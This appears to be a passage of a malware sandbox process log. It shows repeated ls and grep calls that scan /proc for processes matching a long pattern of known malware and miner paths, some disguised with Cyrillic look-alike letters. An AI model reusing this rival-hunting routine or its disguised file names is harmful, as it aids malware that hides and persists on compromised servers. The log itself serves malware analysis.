/bin/lsls -latrh /proc/202⤵PID:836
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:839
-
-
/bin/grepgrep exe2⤵PID:842
-
-
/bin/lsls -latrh /proc/212⤵PID:841
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:844
-
-
/bin/grepgrep exe2⤵PID:847
-
-
/bin/lsls -latrh /proc/2162⤵PID:846
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:849
-
-
/bin/grepgrep exe2⤵PID:852
-
-
/bin/lsls -latrh /proc/222⤵PID:851
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:854
-
-
/bin/grepgrep exe2⤵PID:857
-
-
/bin/lsls -latrh /proc/232⤵PID:856
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:859
-
-
/bin/grepgrep exe2⤵PID:862
-
-
/bin/lsls -latrh /proc/2362⤵PID:861
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:864
-
-
/bin/grepgrep exe2⤵PID:867
-
-
/bin/lsls -latrh /proc/242⤵PID:866
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:869
-
-
/bin/grepgrep exe2⤵PID:872
-
-
/bin/lsls -latrh /proc/32⤵PID:871
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:874
-
-
/bin/grepgrep exe2⤵PID:877
-
-
/bin/lsls -latrh /proc/3262⤵PID:876
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:879
-
-
/bin/grepgrep exe2⤵PID:882
-
-
/bin/lsls -latrh /proc/3272⤵PID:881
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:884
-
-
/bin/grepgrep exe2⤵PID:887
-
-
/bin/lsls -latrh /proc/3302⤵PID:886
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:889
-
-
/bin/grepgrep exe2⤵PID:892
-
-
/bin/lsls -latrh /proc/3312⤵PID:891
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:894
-
-
/bin/grepgrep exe2⤵PID:897
-
-
/bin/lsls -latrh /proc/3342⤵PID:896
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:899
-
-
/bin/grepgrep exe2⤵PID:902
-
-
/bin/lsls -latrh /proc/362⤵PID:901
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:904
-
-
/bin/grepgrep exe2⤵PID:907
-
-
/bin/lsls -latrh /proc/372⤵PID:906
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:909
-
-
/bin/grepgrep exe2⤵PID:912
-
-
/bin/lsls -latrh /proc/3802⤵PID:911
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:914
-
-
/bin/grepgrep exe2⤵PID:917
-
-
/bin/lsls -latrh /proc/3812⤵PID:916
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:919
-
-
/bin/grepgrep exe2⤵PID:922
-
-
/bin/lsls -latrh /proc/3862⤵PID:921
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:924
-
-
/bin/grepgrep exe2⤵PID:927
-
-
/bin/lsls -latrh /proc/42⤵PID:926
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:930
-
-
/bin/grepgrep exe2⤵PID:934
-
-
/bin/lsls -latrh /proc/4172⤵PID:933
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:936
-
-
/bin/grepgrep exe2⤵PID:940
-
-
/bin/lsls -latrh /proc/52⤵PID:939
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:943
-
-
/bin/grepgrep exe2⤵PID:947
-
-
/bin/lsls -latrh /proc/62⤵PID:946
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:950
-
-
/bin/grepgrep exe2⤵PID:953
-
-
/bin/lsls -latrh /proc/6652⤵PID:952
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:957
-
-
/bin/lsls -latrh /proc/6712⤵PID:959
-
-
/bin/grepgrep exe2⤵PID:960
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:963
-
-
/bin/grepgrep exe2⤵PID:967
-
-
/bin/lsls -latrh /proc/6792⤵
- Reads runtime system information
PID:966
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:969
-
-
/bin/grepgrep exe2⤵PID:973
-
-
/bin/lsls -latrh /proc/6862⤵PID:972
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:976
-
-
/bin/grepgrep exe2⤵PID:979
-
-
/bin/lsls -latrh /proc/6872⤵PID:978
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:983
-
-
/bin/grepgrep exe2⤵PID:986
-
-
/bin/lsls -latrh /proc/6892⤵PID:985
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:990
-
-
/bin/grepgrep exe2⤵PID:993
-
-
/bin/lsls -latrh /proc/692⤵PID:992
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:996
-
-
/bin/grepgrep exe2⤵PID:1000
-
-
/bin/lsls -latrh /proc/72⤵PID:999
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1002
-
-
/bin/grepgrep exe2⤵PID:1006
-
-
/bin/lsls -latrh /proc/7012⤵PID:1005
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1009
-
-
/bin/lsls -latrh /proc/7022⤵PID:1012
-
-
/bin/grepgrep exe2⤵PID:1013
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1016
-
-
/bin/grepgrep exe2⤵PID:1020
-
-
/bin/lsls -latrh /proc/7062⤵PID:1019
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1023
-
-
/bin/grepgrep exe2⤵PID:1027
-
-
/bin/lsls -latrh /proc/7072⤵PID:1026
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1030
-
-
/bin/lsls -latrh /proc/7082⤵PID:1032
-
-
/bin/grepgrep exe2⤵PID:1033
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1037
-
-
/bin/lsls -latrh /proc/712⤵PID:1039
-
-
/bin/grepgrep exe2⤵PID:1040
-
-
